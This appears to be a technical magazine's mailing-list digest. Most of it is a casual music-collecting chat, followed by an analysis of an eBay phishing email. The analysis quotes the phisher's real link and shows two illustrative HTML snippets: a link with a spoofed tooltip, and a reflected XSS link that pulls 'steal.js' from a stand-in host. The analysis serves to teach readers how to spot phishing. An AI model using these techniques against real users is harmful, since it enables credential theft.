Metal attitude: arrogant
Metal music: outgrowth of hard rock (Zeppelin, Hendrix, psychedelic); non-danceable; frequently screaming vocals; quasi-ballads
Metal look: scruffy

Post-punk attitude (grunge etc.): resigned losers
Post-punk music: a wide variety; borrows more from rock
Post-punk look: scruffy, slacker (plus a lot of other variations)
Notice the difference?
[Jimmy] Sure, not that I agree.
I've actually been going back to my New Wave roots. Missing Persons, Bowie, Duran Duran, the Police -- all monstrosities I've re-acquired recently. My own personal 'fuck you' to the record industry (see SWF thread) and the output of most current bands. Plus a little bit of "real men do listen to new wave (and eat quiche)" rebellion.
[Jimmy] Eep. My roots are bands like Smashing Pumpkins and Soundgarden, so there's not much digging for me to do.
Actually, no digging required. The record stores are giving them away for $4 because nobody wants them. Your stuff would be at the recently-inflated price of $9 (used). Plus, I can get them on vinyl rather than CD, so I avoid the CD premium.
[Thomas] This is something I am seeing a lot here too. What I would class as "good" music is being put in these so-called "bargain buckets" as a quick sale. Bands like 'Love' are always in there. It's even more of a shame in that, although 'Forever Changes' is very highly rated as an album, it's also been degraded -- it now carries the label of being "past its time", simply because it's so common to see it in these bargain buckets.
I couldn't believe an ad I saw yesterday, offering The Clash and other classic albums for the "great discount price" of $8.99. Ahem? For albums that have been out for years and have long paid for themselves and should now be worth $6?
[Thomas] See above. I found my copy of Mellow Candle's Swaddling Songs that way.
[Jimmy] Hmm. I don't mind buying remastered albums on CD for more than they would normally be worth, as long as there's something other than a fresh mix. A few of the early Cure albums now come with a second CD of outtakes etc., which is worth it (and makes me glad I didn't rush out and buy them a few years ago).
The worst thing about listening to metal is that metal labels like Roadrunner are really into ripping off fans: every album is released twice; first in a jewel case, then six months later in a digipack with bonus tracks. It's impossible to tell in advance whether or not the bonus tracks are worth waiting for -- more often than not they're just live tracks -- but it really seems like a punishment for liking a band enough to buy their album as soon as it comes out.
I made that mistake once with Radiohead's "Hail to the Thief". Both versions were released simultaneously, but I wanted the "special" artwork in the cardboard case, which turned out to be nothing special.
What's funny is, new wave albums will soon become collectors' items, disappear from the record stores, and reappear on eBay for $100 each. Even ones that you thought should never have seen the light of day. I thought a lot of used stuff like the Clash would always be plentiful, but it has already disappeared into collectors' hands, at least around here. If I'd known that, I would have kept all the records I'd gotten rid of over the years. I had all my CDs stolen in 2000, and some of the Industrial stuff is practically irreplaceable now.
[Jimmy] Well... my CD collection has basically been merged with my brother's. Not a problem while we're both at home, but I'm moving out next week... I'll probably just leave my CDs here rather than go through the inevitable "who owns what" arguments. (And partly because I'd rather use my MP3 player, and don't own a CD player anyway.)
I was never really into buying things for the sake of collecting -- I'm more interested in the contents than the physical item -- but there are a few albums that I'm glad I own on both vinyl and CD because of the artwork. If I ever find "Master of Puppets" or "Reign in Blood" on vinyl, my normally subdued collector's instinct will take control.
I generally don't collect things for resale. It's more a matter of keeping things you'll never find again, that you're likely to want later. Or if you like a certain subculture, building up a "complete" collection of used items over the years. ("See! I got all of this used. This one came from a thrift shop, this one from a garage sale, this one a friend gave to me, this one I got while visiting England, this one a friend brought me when he was visiting the US...")
But in the 80s and 90s I was moving a lot, so I was more interested in being portable and lightweight than in saving stuff. In high school, my cousin came to live with us with all her possessions in a Volkswagen, and I thought, "Wow, that's cool." I never managed that -- my moves went up from two pickup truckloads to four -- but that's mainly coz I have furniture now. [1] In high school (1982) I could always find any 60s album I wanted used, from the Beatles to the Kinks to Jefferson Airplane, and I loaded up on Rush. I just assumed that would always be the case, so I unloaded anything I didn't have an immediate want for. But I didn't anticipate how short-lived the Industrial and Ambient eras would be, or how quickly the material would disappear. Maybe it's just coz I moved from mainstream music to obscure music, and that always happens with obscure music.
[1] Henry Rollins' bed story is so funny. He had a favorite futon that he'd used for eight years, so it was all scrunched down. His girlfriend saw it and said, "Henry! You can't sleep on that! We have to get you a proper bed." So she dragged him to the bed store. He told the clerk, "I've never shopped for a bed before. How do you do it?" The clerk said, "Just lie down on several till you find one you like." So he did, and one bed was so comfortable it talked to him: "Come to Henry!" So he bought that one. But he couldn't bear to get rid of his beloved futon, so he kept it under the bed.
[Jimmy] Though I have managed to track down some obscure Irish bands recently: Scheer were the most recent.
Sat, 07 Jan 2006
From Daniel J. Priem
For such problems I use http://btmgr.webframe.org/ Smart Boot Manager.
[Rick] So close to a senryu, and yet so far.
Sun, 29 Jan 2006
From Jimmy O'Regan
http://www.comics.com/comics/pearls/archive/images/pearls20060121046729.jpg
Fri, 17 Feb 2006
From Benjamin A. Okopnik
Here's one that might get past a number of people; other than the way-too-crude XSS attack imitation, it's going to be rather effective for a certain segment of the population.
About a day ago, Kat put some of our boat cruft up on eBay. Last night, I got this email:
Your registered name is included to show this message originated from eBay. Learn more.

Question about Item -- Respond Now

eBay sent this message on behalf of an eBay member via My Messages. Responses sent using email will go to the eBay member directly and will include your email address. Click the Respond Now button below to send your response via My Messages (your email address will not be included).

Question from rubyndao
This message was sent while the listing was active. rubyndao is a potential buyer.

    Hi,
    I would like to know S&H and also if you have a buy it now
    Thanks
    Ruby

    Respond to this question in My Messages.
    http://contact.ebay.co.uk/ws/eBayISAPI.dll?M2MContact&item=4589070441&requested=yamama_r6&qid=1470018712&redirect=0&sspagename=ADME:B:AAQ:UK:2

Marketplace Safety Tip
Always remember to complete your transactions on eBay - it's the safer way to trade. Is this message an offer to buy your item directly through email without winning the item on eBay* If so, please help make the eBay marketplace safer by reporting it to us. These external transactions may be unsafe and are against eBay policy. Learn more about trading safely.
Is this email inappropriate* Does it breach eBay policy* Help protect the community by reporting it.

Thank you for using eBay
http://www.ebay.com/

Learn how you can protect yourself from spoof (fake) emails at: http://pages.ebay.com/education/spooftutorial

This eBay notice was sent to kvnmtchll200@aol.com on behalf of another eBay member through the eBay platform and in accordance with our Privacy Policy. If you would like to receive this email in text format, change your notification preferences.

See our Privacy Policy and User Agreement if you have questions about eBay's communication policies.
Privacy Policy: http://pages.ebay.com/help/policies/privacy-policy.html
User Agreement: http://pages.ebay.com/help/policies/user-agreement.html

Copyright © 2005 eBay, Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. eBay and the eBay logo are registered trademarks or trademarks of eBay, Inc.
Notice anything unusual? Here are a couple of things that sent up red flags for me right away: for one, the notice was supposedly sent to "kvnmtchll200@aol.com", which is not our address; for another, the punctuation is mangled throughout, with asterisks where the question marks should be.
Best of all, though, is what happens when you load it up in a browser (I'll include the HTML just so those who are interested can play with it):
[Jimmy] Warning! Certain browsers try to render this!
See attached phishing-source.txt
Take a careful look at that "Submit" button link:
<A title=http://contact.ebay.co.uk/ws/eBayISAPI.dll?M2MContact&item=4589070441&requested=yamama_r6&qid=1470018712&redirect=0&sspagename=ADME:B:AAQ:UK:2
   onclick="return ShowLinkWarning()"
   href="http://www.varzavarzarau.go.ro/ws/ws/arribada/issapidll/SignIncopartnerId2pUserIdsiteidpageTypepa1i1bshowgifUsingSSLruwwwebaycomppp2errmsgrunameruparamsruproductsidfavoritenavmigrateVisitor/SignIn.html"
   target=_blank onfiltered="return ShowLinkWarning()">
So, the button is going to pop up a little label saying it's from 'ebay.co.uk'... but it actually links to (and your status bar will show) the 'www.varzavarzarau.go.ro' address. Clicking on it takes you to a look-alike eBay login page... except that it, too, has a couple of those minor quirks, much like the page above.
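Stripped of the eBay dressing, the trick itself is tiny. Here's a minimal sketch of it -- the URLs below are hypothetical stand-ins, not the phisher's actual addresses. The tooltip and the visible link text both advertise one site, but the browser follows only the href:

<!-- Minimal spoofed link (hypothetical URLs). The title attribute sets the
     tooltip, and the link text is what the victim reads -- but only the
     href decides where the click actually goes. -->
<a title="http://contact.ebay.co.uk/ws/eBayISAPI.dll"
   href="http://phisher.example.net/fake-ebay-login.html">
   http://contact.ebay.co.uk/ws/eBayISAPI.dll
</a>

That leaves the status bar as the one honest indicator -- and in browsers of that era, even it could be papered over by an onmouseover handler setting window.status. Hence the standard advice: type the address yourself.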
Naivete costs money - and these days, it happens at Internet speeds.
Oh, to expand on the "XSS" bit: what made it crude is that it was missing one of the critical components of XSS. If you look at the URL in the address bar when the ostensible "eBay login page" shows up, it's that "www.varzavarzarau.go.ro" one, with a very long tail on it. In an actual XSS attack, once you get that far in the process, there's almost no way to tell -- since you're actually at the page where you think you are, but you're "piped through" someone else's machine.
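For contrast, here's a rough sketch of what the real thing looks like; the site, page, and parameter names are all made up for illustration. In a reflected XSS attack, the victim genuinely lands on the legitimate domain, and the attacker's script rides in on an unsanitized parameter:

<!-- Hypothetical link from a phishing mail. The address bar will show the
     REAL auction site's domain, because that is genuinely where you are... -->
<a href="http://auctions.example.com/search?q=%3Cscript%20src%3D%22http%3A%2F%2Fphisher.example.net%2Fsteal.js%22%3E%3C%2Fscript%3E">
   Respond Now
</a>

<!-- ...but if auctions.example.com echoes the 'q' parameter back into the
     results page without escaping it, the decoded payload

         <script src="http://phisher.example.net/steal.js"></script>

     runs in the real site's security context, with access to its cookies
     and forms -- and nothing in the address bar gives it away. -->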